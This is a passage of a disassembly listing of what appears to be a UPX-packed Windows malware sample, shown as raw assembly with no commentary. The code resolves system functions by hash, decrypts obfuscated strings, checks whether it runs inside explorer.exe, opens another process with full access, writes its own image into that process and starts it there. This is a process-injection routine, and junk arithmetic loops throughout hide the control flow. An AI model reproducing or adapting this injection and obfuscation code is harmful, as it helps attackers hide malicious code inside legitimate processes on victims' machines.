call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_402A6F: ; CODE XREF: sub_402A18+23�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_402A3D
loc_402A78: ; CODE XREF: sub_402A18+38�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A7F proc near ; CODE XREF: sub_40301C+1B7�p
; UPX0:00403408�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push 23h
pop ecx
push 0FFFFFFF9h
pop eax
loc_402A8E: ; CODE XREF: sub_402A7F+24�j
cmp eax, 0BDh
ja short loc_402A97
inc ecx
inc eax
loc_402A97: ; CODE XREF: sub_402A7F+14�j
add ecx, 1Dh
add eax, 1Dh
cmp ecx, 8Fh
jl short loc_402A8E
mov dword_405104, ecx
call sub_401113
and eax, 0FFFF0000h
cmp ecx, 58h
mov [ebp+var_8], eax
jge short loc_402AC4
inc ecx
mov dword_405104, ecx
loc_402AC4: ; CODE XREF: sub_402A7F+3C�j
test ecx, ecx
jl short loc_402ACF
inc ecx
mov dword_405104, ecx
loc_402ACF: ; CODE XREF: sub_402A7F+47�j
cmp ecx, 0ABh
jle short loc_402AE1
mov dword_405104, 1Ch
loc_402AE1: ; CODE XREF: sub_402A7F+56�j
mov edx, [eax+3Ch]
push ebx
push esi
push edi
push 34h
add edx, eax
pop eax
push 6
pop ecx
push 22h
mov [ebp+var_24], edx
pop edi
loc_402AF5: ; CODE XREF: sub_402A7F+87�j
cmp ecx, 0C9h
ja short loc_402AFF
inc eax
inc ecx
loc_402AFF: ; CODE XREF: sub_402A7F+7C�j
add eax, edi
add ecx, edi
cmp eax, 78h
jl short loc_402AF5
add edx, 18h
xor ebx, ebx
push 1Ah
inc ebx
mov [ebp+var_1C], edx
pop eax
mov ecx, ebx
loc_402B16: ; CODE XREF: sub_402A7F+AC�j
cmp ecx, 0B5h
ja short loc_402B20
inc eax
inc ecx
loc_402B20: ; CODE XREF: sub_402A7F+9D�j
add eax, 0Fh
add ecx, 0Fh
cmp eax, 91h
jl short loc_402B16
push 14h
mov dword_405104, eax
mov esi, [edx+38h]
pop eax
push 7
mov [ebp+var_18], esi
mov [ebp+var_1], 0
pop ecx
loc_402B42: ; CODE XREF: sub_402A7F+D8�j
cmp ecx, 0E4h
ja short loc_402B4C
inc eax
inc ecx
loc_402B4C: ; CODE XREF: sub_402A7F+C9�j
add eax, 1Ch
add ecx, 1Ch
cmp eax, 0B0h
jl short loc_402B42
cmp eax, 2
mov dword_405104, eax
jl short loc_402B69
inc eax
mov dword_405104, eax
loc_402B69: ; CODE XREF: sub_402A7F+E2�j
cmp eax, 0F0h
jle short loc_402B76
mov dword_405104, edi
loc_402B76: ; CODE XREF: sub_402A7F+EF�j
push 0A08B638Ch
push ebx
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
neg edi
sbb edi, edi
push 0EF0A25B7h
and edi, 3Ch
push ebx
add edi, 4
call sub_401117
pop ecx
pop ecx
xor ecx, ecx
push ecx
push esi
push ecx
push edi
push ecx
push 0FFFFFFFFh
call eax
xor esi, esi
cmp eax, esi
mov [ebp+var_14], eax
jnz short loc_402BBB
xor al, al
jmp loc_403017
; ---------------------------------------------------------------------------
loc_402BBB: ; CODE XREF: sub_402A7F+133�j
mov eax, dword_405104
add eax, 0FFFFFFC0h
cmp eax, 0B8h
ja short loc_402BD0
inc dword_405104
loc_402BD0: ; CODE XREF: sub_402A7F+149�j
push 5CD9430h
push ebx
call sub_401117
pop ecx
pop ecx
push esi
push esi
push esi
push 2
push [ebp+var_14]
call eax
cmp eax, esi
mov [ebp+var_C], eax
jz loc_402FC1
cmp dword_405104, ebx
jl short loc_402C00
inc dword_405104
loc_402C00: ; CODE XREF: sub_402A7F+179�j
cmp dword_405104, 0C3h
jle short loc_402C16
mov dword_405104, 1Bh
loc_402C16: ; CODE XREF: sub_402A7F+18B�j
cmp dword_405104, 47h
jge short loc_402C25
inc dword_405104
loc_402C25: ; CODE XREF: sub_402A7F+19E�j
push 12h
mov esi, offset dword_405208
push esi
push offset aDrVpyeKpsVu ; "ÅØDRÚÉVPYEÑKPSØVUÕ"
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_404000 ; lstrcpy
cmp dword_405104, 2
jl short loc_402C54
inc dword_405104
loc_402C54: ; CODE XREF: sub_402A7F+1CD�j
cmp dword_405104, 0BEh
jle short loc_402C6A
mov dword_405104, 1Fh
loc_402C6A: ; CODE XREF: sub_402A7F+1DF�j
push 9
push esi
push offset dword_40421C
call sub_40102E
push 0C8AC8026h
push ebx
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
push 3Fh
pop ecx
push 22h
pop edx
loc_402CA4: ; CODE XREF: sub_402A7F+23B�j
cmp edx, 0ABh
ja short loc_402CAE
inc ecx
inc edx
loc_402CAE: ; CODE XREF: sub_402A7F+22B�j
add ecx, 0Eh
add edx, 0Eh
cmp ecx, 0B1h
jl short loc_402CA4
xor edx, edx
cmp ecx, 0Dh
mov dword_405104, ecx
mov [ebp+var_10], edx
jl short loc_402CD3
inc ecx
mov dword_405104, ecx
loc_402CD3: ; CODE XREF: sub_402A7F+24B�j
cmp ecx, 0A0h
jle short loc_402CE4
push 14h
pop ecx
mov dword_405104, ecx
loc_402CE4: ; CODE XREF: sub_402A7F+25A�j
mov esi, [ebp+var_18]
mov [ebp+var_20], esi
lea esi, [ecx-7]
cmp esi, 0C4h
ja short loc_402CFC
inc ecx
mov dword_405104, ecx
loc_402CFC: ; CODE XREF: sub_402A7F+274�j
push edi
push edx
push ebx
lea ecx, [ebp+var_20]
push ecx
push edx
push edx
push edx
lea ecx, [ebp+var_10]
push ecx
push [ebp+arg_4]
push [ebp+var_14]
call eax
cmp dword_405104, 10h
jl short loc_402D21
inc dword_405104
loc_402D21: ; CODE XREF: sub_402A7F+29A�j
cmp dword_405104, 0B0h
jle short loc_402D37
mov dword_405104, 21h
loc_402D37: ; CODE XREF: sub_402A7F+2AC�j
push [ebp+var_18]
push [ebp+var_8]
push [ebp+var_C]
call sub_4010EE
add esp, 0Ch
push 12h
pop eax
push 0FFFFFFE4h
pop ecx
loc_402D4E: ; CODE XREF: sub_402A7F+2E4�j
cmp ecx, 0C3h
ja short loc_402D58
inc eax
inc ecx
loc_402D58: ; CODE XREF: sub_402A7F+2D5�j
add eax, 1Eh
add ecx, 1Eh
cmp eax, 8Eh
jl short loc_402D4E
mov dword_405104, eax
mov eax, [ebp+var_24]
movzx edx, word ptr [eax+14h]
add edx, [ebp+var_1C]
push 60h
pop eax
push 22h
pop ecx
loc_402D7A: ; CODE XREF: sub_402A7F+30E�j
cmp ecx, 92h
ja short loc_402D84
inc eax
inc ecx
loc_402D84: ; CODE XREF: sub_402A7F+301�j
add eax, 1Fh
add ecx, 1Fh
cmp eax, 7Bh
jl short loc_402D7A
mov edi, [ebp+var_10]
push 5Bh
pop eax
mov ebx, edi
sub ebx, [ebp+var_8]
push 54h
pop ecx
loc_402D9D: ; CODE XREF: sub_402A7F+331�j
cmp ecx, 0D0h
ja short loc_402DA7
inc eax
inc ecx
loc_402DA7: ; CODE XREF: sub_402A7F+324�j
add eax, 15h
add ecx, 15h
cmp eax, 66h
jl short loc_402D9D
mov dword_405104, eax
mov ecx, [edx+34h]
add ecx, [ebp+var_8]
cmp eax, 4Dh
jge short loc_402DC8
inc eax
mov dword_405104, eax
loc_402DC8: ; CODE XREF: sub_402A7F+341�j
; sub_402A7F+35A�j
cmp word ptr [ecx], 0BE8Dh
jnz short loc_402DD8
cmp dword ptr [ecx+6], 0C009078Bh
jz short loc_402DDB
loc_402DD8: ; CODE XREF: sub_402A7F+34E�j
inc ecx
jmp short loc_402DC8
; ---------------------------------------------------------------------------
loc_402DDB: ; CODE XREF: sub_402A7F+357�j
mov ecx, [ecx+2]
add ecx, [edx+0Ch]
add ecx, [ebp+var_8]
xor esi, esi
jmp short loc_402DF5
; ---------------------------------------------------------------------------
loc_402DE8: ; CODE XREF: sub_402A7F+378�j
add ecx, 8
jmp short loc_402DEE
; ---------------------------------------------------------------------------
loc_402DED: ; CODE XREF: sub_402A7F+372�j
inc ecx
loc_402DEE: ; CODE XREF: sub_402A7F+36C�j
cmp [ecx], si
jnz short loc_402DED
inc ecx
inc ecx
loc_402DF5: ; CODE XREF: sub_402A7F+367�j
cmp [ecx], esi
jnz short loc_402DE8
cmp eax, 2
jl short loc_402E04
inc eax
mov dword_405104, eax
loc_402E04: ; CODE XREF: sub_402A7F+37D�j
cmp eax, 0C8h
jle short loc_402E13
push 20h
pop eax
mov dword_405104, eax
loc_402E13: ; CODE XREF: sub_402A7F+38A�j
add ecx, 4
cmp eax, 22h
jge short loc_402E21
inc eax
mov dword_405104, eax
loc_402E21: ; CODE XREF: sub_402A7F+39A�j
mov edx, [edx+0Ch]
mov esi, [ebp+var_C]
lea esi, [edx+esi-4]
lea edx, [eax-17h]
cmp edx, 0D5h
ja short loc_402E3C
inc eax
mov dword_405104, eax
loc_402E3C: ; CODE XREF: sub_402A7F+3B5�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402E6F
loc_402E43: ; CODE XREF: sub_402A7F+3E6�j
cmp dl, 0F0h
jnb short loc_402E4F
movzx eax, dl
add esi, eax
jmp short loc_402E5E
; ---------------------------------------------------------------------------
loc_402E4F: ; CODE XREF: sub_402A7F+3C7�j
movzx eax, word ptr [ecx]
and edx, 0Fh
shl edx, 10h
or edx, eax
add esi, edx
inc ecx
inc ecx
loc_402E5E: ; CODE XREF: sub_402A7F+3CE�j
add [esi], ebx
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_402E43
mov edi, [ebp+var_10]
mov eax, dword_405104
loc_402E6F: ; CODE XREF: sub_402A7F+3C2�j
sub edi, [ebp+var_8]
add edi, [ebp+arg_0]
cmp eax, 5
mov esi, edi
jl short loc_402E82
inc eax
mov dword_405104, eax
loc_402E82: ; CODE XREF: sub_402A7F+3FB�j
cmp eax, 0CEh
jle short loc_402E91
push 17h
pop eax
mov dword_405104, eax
loc_402E91: ; CODE XREF: sub_402A7F+408�j
xor edi, edi
cmp [ebp+arg_8], edi
jnz short loc_402F12
cmp eax, 79h
jge short loc_402EA3
inc eax
mov dword_405104, eax
loc_402EA3: ; CODE XREF: sub_402A7F+41C�j
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push edi
push edi
push edi
push esi
push edi
push edi
push [ebp+arg_4]
call eax
mov esi, eax
mov eax, dword_405104
add eax, 0FFFFFFFEh
cmp eax, 0DCh
ja short loc_402ED3
inc dword_405104
loc_402ED3: ; CODE XREF: sub_402A7F+44C�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
cmp dword_405104, 0E4h
jge short loc_402EF6
inc dword_405104
loc_402EF6: ; CODE XREF: sub_402A7F+46F�j
cmp dword_405104, 4Fh
mov [ebp+var_1], 1
jge loc_402FC1
inc dword_405104
jmp loc_402FC1
; ---------------------------------------------------------------------------
loc_402F12: ; CODE XREF: sub_402A7F+417�j
push 10h
pop eax
push 0FFFFFFE2h
mov [ebp+var_310], 10002h
pop ecx
loc_402F22: ; CODE XREF: sub_402A7F+4B6�j
cmp ecx, 0A6h
ja short loc_402F2C
inc eax
inc ecx
loc_402F2C: ; CODE XREF: sub_402A7F+4A9�j
add eax, 26h
add ecx, 26h
cmp eax, 72h
jl short loc_402F22
push 0AA1DE02Fh
push 1
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 1Ah
pop eax
push 0FFFFFFD5h
mov [ebp+var_260], esi
pop ecx
loc_402F62: ; CODE XREF: sub_402A7F+4F8�j
cmp ecx, 9Fh
ja short loc_402F6C
inc eax
inc ecx
loc_402F6C: ; CODE XREF: sub_402A7F+4E9�j
add eax, 13h
add ecx, 13h
cmp eax, 0ADh
jl short loc_402F62
push 0AA1DC82Fh
push 1
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
cmp dword_405104, 0Fh
mov [ebp+var_1], 1
jl short loc_402FAB
inc dword_405104
loc_402FAB: ; CODE XREF: sub_402A7F+524�j
cmp dword_405104, 0C7h
jle short loc_402FC1
mov dword_405104, 20h
loc_402FC1: ; CODE XREF: sub_402A7F+16D�j
; sub_402A7F+482�j ...
cmp dword_405104, 80h
jge short loc_402FD3
inc dword_405104
loc_402FD3: ; CODE XREF: sub_402A7F+54C�j
cmp [ebp+var_C], 0
jz short loc_402FEC
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
loc_402FEC: ; CODE XREF: sub_402A7F+558�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_14]
call eax
mov eax, dword_405104
add eax, 0FFFFFFADh
cmp eax, 87h
ja short loc_403014
inc dword_405104
loc_403014: ; CODE XREF: sub_402A7F+58D�j
mov al, [ebp+var_1]
loc_403017: ; CODE XREF: sub_402A7F+137�j
pop edi
pop esi
pop ebx
leave
retn
sub_402A7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40301C proc near ; DATA XREF: UPX0:00403403�o
; UPX0:00403622�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push 55h
pop eax
push 39h
pop ecx
loc_40302B: ; CODE XREF: sub_40301C+24�j
cmp ecx, 0BAh
ja short loc_403035
inc eax
inc ecx
loc_403035: ; CODE XREF: sub_40301C+15�j
add eax, 25h
add ecx, 25h
cmp eax, 9Eh
jl short loc_40302B
push 38h
pop eax
push 20h
pop ecx
loc_403048: ; CODE XREF: sub_40301C+41�j
cmp ecx, 0CAh
ja short loc_403052
inc eax
inc ecx
loc_403052: ; CODE XREF: sub_40301C+32�j
add eax, 23h
add ecx, 23h
cmp eax, 88h
jl short loc_403048
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
cmp dword_405104, ebx
jl short loc_40308B
inc dword_405104
loc_40308B: ; CODE XREF: sub_40301C+67�j
cmp dword_405104, 0E7h
jle short loc_4030A1
mov dword_405104, 21h
loc_4030A1: ; CODE XREF: sub_40301C+79�j
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_402A18
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
cmp dword_405104, edi
jl short loc_4030FE
inc dword_405104
loc_4030FE: ; CODE XREF: sub_40301C+DA�j
cmp dword_405104, 0D6h
jle short loc_403114
mov dword_405104, 18h
loc_403114: ; CODE XREF: sub_40301C+EC�j
push 0Ch
mov esi, offset dword_405208
push esi
push offset byte_40423C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40400C ; lstrcat
mov esi, dword_405104
lea eax, [esi-42h]
cmp eax, 97h
ja short loc_40314E
inc esi
mov dword_405104, esi
loc_40314E: ; CODE XREF: sub_40301C+129�j
lea eax, [esi-12h]
cmp eax, 0C5h
ja short loc_40315F
inc esi
mov dword_405104, esi
loc_40315F: ; CODE XREF: sub_40301C+13A�j
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
jl short loc_403189
inc esi
mov dword_405104, esi
loc_403189: ; CODE XREF: sub_40301C+164�j
cmp esi, 0D8h
jle short loc_40319B
mov dword_405104, 1Ah
loc_40319B: ; CODE XREF: sub_40301C+173�j
push 46318AC7h
push ebx
call sub_401117
pop ecx
pop ecx
push offset dword_40540C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_405410
push dword_40540C
push offset sub_4020E2
call sub_402A7F
add esp, 0Ch
test al, al
jz short loc_4031F5
mov esi, dword_405410
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_4031F5: ; CODE XREF: sub_40301C+1C1�j
mov eax, dword_405104
cmp eax, 0Bh
pop esi
jl short loc_403206
inc eax
mov dword_405104, eax
loc_403206: ; CODE XREF: sub_40301C+1E2�j
cmp eax, 0D9h
jle short loc_403215
push 21h
pop eax
mov dword_405104, eax
loc_403215: ; CODE XREF: sub_40301C+1EF�j
cmp eax, 4
jl short loc_403220
inc eax
mov dword_405104, eax
loc_403220: ; CODE XREF: sub_40301C+1FC�j
cmp eax, 0B6h
jle short loc_403231
mov dword_405104, 25h
loc_403231: ; CODE XREF: sub_40301C+209�j
push 768AA260h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
push 4Bh
pop eax
push 29h
pop ecx
pop edi
pop ebx
loc_403249: ; CODE XREF: sub_40301C+242�j
cmp ecx, 0D6h
ja short loc_403253
inc eax
inc ecx
loc_403253: ; CODE XREF: sub_40301C+233�j
add eax, 14h
add ecx, 14h
cmp eax, 0A3h
jl short loc_403249
mov dword_405104, eax
xor eax, eax
leave
retn 4
sub_40301C endp
; ---------------------------------------------------------------------------
loc_40326B: ; CODE XREF: UPX1:0040886C�j
push ebp
mov ebp, esp
sub esp, 13Ch
push 2Eh
pop eax
push 0FFFFFFD2h
pop ecx
loc_40327A: ; CODE XREF: UPX0:0040328F�j
cmp ecx, 8Dh
ja short loc_403284
inc eax
inc ecx
loc_403284: ; CODE XREF: UPX0:00403280�j
add eax, 29h
add ecx, 29h
cmp eax, 85h
jl short loc_40327A
push ebx
push esi
push edi
push 5Dh
pop eax
push 45h
pop ecx
push 1Ch
lea ebx, [ebp-13Ch]
pop edx
loc_4032A3: ; CODE XREF: UPX0:004032B4�j
cmp ecx, 0DCh
ja short loc_4032AD
inc eax
inc ecx
loc_4032AD: ; CODE XREF: UPX0:004032A9�j
add eax, edx
add ecx, edx
cmp eax, 7Fh
jl short loc_4032A3
cmp eax, 11h
mov dword_405104, eax
jl short loc_4032C6
inc eax
mov dword_405104, eax
loc_4032C6: ; CODE XREF: UPX0:004032BE�j
cmp eax, 0E9h
jle short loc_4032D3
mov dword_405104, edx
loc_4032D3: ; CODE XREF: UPX0:004032CB�j
call sub_4013F5
test al, al
jz loc_403663
push offset dword_40425C
call sub_4015DC
test eax, eax
pop ecx
jbe loc_403663
cmp dword_405104, 2Fh
jge short loc_403302
inc dword_405104
loc_403302: ; CODE XREF: UPX0:004032FA�j
mov edi, 774393E8h
push edi
push 1
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp-13Ch]
push ecx
push 0
call eax
xor ecx, ecx
test eax, eax
jz short loc_40333C
loc_403328: ; CODE XREF: UPX0:0040333A�j
lea edx, [ebp+ecx-13Bh]
cmp byte ptr [edx-1], 5Ch
jnz short loc_403337
mov ebx, edx
loc_403337: ; CODE XREF: UPX0:00403333�j
inc ecx
cmp ecx, eax
jnz short loc_403328
loc_40333C: ; CODE XREF: UPX0:00403326�j
mov ecx, [ebx]
mov eax, 20202020h
or ecx, eax
cmp ecx, 6C707865h
jnz loc_403437
mov ecx, [ebx+4]
or ecx, eax
cmp ecx, 7265726Fh
jnz loc_403437
mov ecx, [ebx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_403437
mov eax, [ebp+0Ch]
dec eax
jnz loc_403430
push 8
pop ecx
push 0Ch
mov esi, offset dword_405208
xor eax, eax
push esi
lea edi, [ebp-38h]
push offset dword_40424C
rep stosd
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp-38h]
push eax
call dword_404000 ; lstrcpy
lea eax, [ebp-38h]
push eax
call sub_4015DC
mov esi, eax
test esi, esi
pop ecx
jz short loc_403430
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
push 33h
mov esi, eax
pop eax
push 2Dh
pop ecx
loc_4033D7: ; CODE XREF: UPX0:004033EA�j
cmp ecx, 0DCh
ja short loc_4033E1
inc eax
inc ecx
loc_4033E1: ; CODE XREF: UPX0:004033DD�j
add eax, 10h
add ecx, 10h
cmp eax, 67h
jl short loc_4033D7
test esi, esi
mov dword_405104, eax
jz short loc_403430
cmp eax, 6Dh
jge short loc_403400
inc eax
mov dword_405104, eax
loc_403400: ; CODE XREF: UPX0:004033F8�j
push 0
push esi
push offset sub_40301C
call sub_402A7F
add esp, 0Ch
cmp dword_405104, 0Ch
jge short loc_40341F
inc dword_405104
loc_40341F: ; CODE XREF: UPX0:00403417�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_403430: ; CODE XREF: UPX0:00403377�j
; UPX0:004033B5�j ...
xor eax, eax
jmp loc_403690
; ---------------------------------------------------------------------------
loc_403437: ; CODE XREF: UPX0:0040334B�j
; UPX0:0040335C�j ...
push edi
xor edi, edi
inc edi
push edi
call sub_401117
pop ecx
pop ecx
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
xor ebx, ebx
push ebx
call eax
push 0D89AD05h
push edi
call sub_401117
pop ecx
pop ecx
call eax
push 80DBBE07h
push 6
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+0Ch]
push ecx
push 20h
push esi
call eax
test eax, eax
mov esi, offset dword_405208
jz loc_40358D
push 58h
pop eax
push 47h
pop ecx
loc_403489: ; CODE XREF: UPX0:0040349E�j
cmp ecx, 0D3h
ja short loc_403493
inc eax
inc ecx
loc_403493: ; CODE XREF: UPX0:0040348F�j
add eax, 30h
add ecx, 30h
cmp eax, 87h
jl short loc_403489
push 57h
pop eax
push 40h
pop ecx
loc_4034A6: ; CODE XREF: UPX0:004034BB�j
cmp ecx, 0B2h
ja short loc_4034B0
inc eax
inc ecx
loc_4034B0: ; CODE XREF: UPX0:004034AC�j
add eax, 21h
add ecx, 21h
cmp eax, 9Eh
jl short loc_4034A6
push 10h
push esi
push offset aKpPXqVVPqp ; "KPÀPÓXQÊÛVÙVÔPQP"
mov dword_405104, eax
call sub_40102E
push 1B3D12B9h
push 6
call sub_401117
add esp, 14h
lea ecx, [ebp-8]
push ecx
push esi
push ebx
call eax
test eax, eax
jz loc_40358D
mov eax, [ebp-8]
mov [ebp-14h], eax
mov eax, [ebp-4]
push 48h
mov [ebp-10h], eax
pop eax
push 36h
mov [ebp-18h], edi
mov dword ptr [ebp-0Ch], 2
pop ecx
loc_40350A: ; CODE XREF: UPX0:0040351F�j
cmp ecx, 0BAh
ja short loc_403514
inc eax
inc ecx
loc_403514: ; CODE XREF: UPX0:00403510�j
add eax, 2Fh
add ecx, 2Fh
cmp eax, 0A9h
jl short loc_40350A
mov edi, [ebp+0Ch]
push 7A2167DCh
push 6
mov dword_405104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
lea ecx, [ebp-18h]
push ecx
push ebx
push edi
call eax
cmp dword_405104, 0Eh
jl short loc_403551
inc dword_405104
loc_403551: ; CODE XREF: UPX0:00403549�j
cmp dword_405104, 0D4h
jle short loc_403567
mov dword_405104, 1Bh
loc_403567: ; CODE XREF: UPX0:0040355B�j
mov edi, [ebp+0Ch]
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push edi
call eax
cmp dword_405104, 0A4h
jge short loc_40358D
inc dword_405104
loc_40358D: ; CODE XREF: UPX0:0040347D�j
; UPX0:004034E8�j ...
xor eax, eax
push 8
pop ecx
lea edi, [ebp-38h]
rep stosd
mov eax, dword_405104
add eax, 0FFFFFFD9h
cmp eax, 0A2h
ja short loc_4035AC
inc dword_405104
loc_4035AC: ; CODE XREF: UPX0:004035A4�j
push 0Ch
push esi
push offset dword_40424C
call sub_40102E
add esp, 0Ch
push esi
lea eax, [ebp-38h]
push eax
call dword_404000 ; lstrcpy
lea eax, [ebp-38h]
push eax
call sub_4015DC
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40364F
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push ebx
push 1F0FFFh
call eax
push 33h
pop ecx
push 2Dh
mov esi, eax
pop eax
loc_4035F6: ; CODE XREF: UPX0:00403608�j
cmp eax, 0DCh
ja short loc_4035FF
inc ecx
inc eax
loc_4035FF: ; CODE XREF: UPX0:004035FB�j
add ecx, 10h
add eax, 10h
cmp ecx, 67h
jl short loc_4035F6
cmp esi, ebx
mov dword_405104, ecx
jz short loc_40364F
cmp ecx, 6Dh
jge short loc_403620
inc ecx
mov dword_405104, ecx
loc_403620: ; CODE XREF: UPX0:00403617�j
push ebx
push esi
push offset sub_40301C
call sub_402A7F
add esp, 0Ch
cmp dword_405104, 0Ch
jge short loc_40363E
inc dword_405104
loc_40363E: ; CODE XREF: UPX0:00403636�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_40364F: ; CODE XREF: UPX0:004035D5�j
; UPX0:00403612�j
cmp dword_405104, 0D2h
jge short loc_40366A
inc dword_405104
jmp short loc_40366A
; ---------------------------------------------------------------------------
loc_403663: ; CODE XREF: UPX0:004032DA�j
; UPX0:004032ED�j
call sub_4020E2
xor ebx, ebx
loc_40366A: ; CODE XREF: UPX0:00403659�j
; UPX0:00403661�j
mov eax, dword_405104
add eax, 0FFFFFFC5h
cmp eax, 0A7h
ja short loc_40367F
inc dword_405104
loc_40367F: ; CODE XREF: UPX0:00403677�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
loc_403690: ; CODE XREF: UPX0:00403432�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4036A0 proc near ; CODE XREF: sub_4015DC+8�p
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_4036B4: ; CODE XREF: sub_4036A0+29�j
cmp ecx, eax
jb short loc_4036C2
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_4036C2: ; CODE XREF: sub_4036A0+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_4036B4
sub_4036A0 endp
; ---------------------------------------------------------------------------
align 4
dd 24Dh dup(0)
dword_404000 dd 77E73167h ; DATA XREF: sub_4015DC+378�r
; sub_401A08+13C�r ...
dword_404004 dd 77E76A2Eh ; DATA XREF: sub_4015DC+296�r
; sub_4015DC+31B�r ...
dword_404008 dd 77E74672h ; DATA XREF: sub_4015DC:loc_4017C9�r
; sub_4015DC+261�r
dword_40400C dd 77E74155h ; DATA XREF: sub_4015DC+396�r
; sub_401A08+8C�r ...
dd 0
dword_404014 dd 77D4C96Ah ; DATA XREF: sub_4020E2+16F�r
; sub_4020E2+748�r ...
dd 0
byte_40401C db 5Bh, 0D6h ; DATA XREF: sub_401117+97�o
; ---------------------------------------------------------------------------
loc_40401E: ; CODE XREF: UPX0:00404021�j
push eax
aam 0D4h
jnp short loc_40401E
cmc
rcl ah, 1
aam 0
loc_404028: ; DATA XREF: sub_401117+88�o
pop eax
fcmovnbe st, st(4)
push esp
push ebp
aad 0F5h
rcl ah, 1
aam 0
loc_404033: ; DATA XREF: sub_401117+79�o
; sub_4020E2+16�o
add [ecx+56h], bl
aad 56h
aad 50h
fdiv st, st(5)
rcl ah, 1
aam 0
loc_404040: ; DATA XREF: sub_401117+6A�o
ficomp dword ptr [ebx+52h]
ficom dword ptr [esi-0Bh]
rcl ah, 1
aam 0
; ---------------------------------------------------------------------------
dw 0
dword_40404C dd 52D9D052h, 0FB7B56DAh, 0D4D4D0F5h, 0 ; DATA XREF: sub_401117+5B�o
dword_40405C dd 5BDB50D9h, 0F5D55556h, 0D4D4D0h ; DATA XREF: sub_401117+36�o
dword_404068 dd 0DDh ; DATA XREF: sub_4015DC+381�o
dword_40406C dd 0D653D95Bh, 0F5D85B55h, 50DE50h ; DATA XREF: sub_4015DC+2DA�o
dword_404078 dd 0FBDB50D9h, 7Ah ; DATA XREF: sub_401A08+77�o
dword_404080 dd 7CD056F1h, 0 ; DATA XREF: sub_4020E2+8CA�o
dword_404088 dd 0D05553F1h, 7CFB50h ; DATA XREF: sub_4020E2+7C4�o
dword_404090 dd 5870h ; DATA XREF: sub_4020E2+733�o
dword_404094 dd 5651505Bh, 5BD057D1h ; DATA XREF: sub_4020E2+6E0�o
; ---------------------------------------------------------------------------
push esp
cmc
loc_40409E: ; CODE XREF: UPX0:004040AB�j
fcmovbe st, st(6)
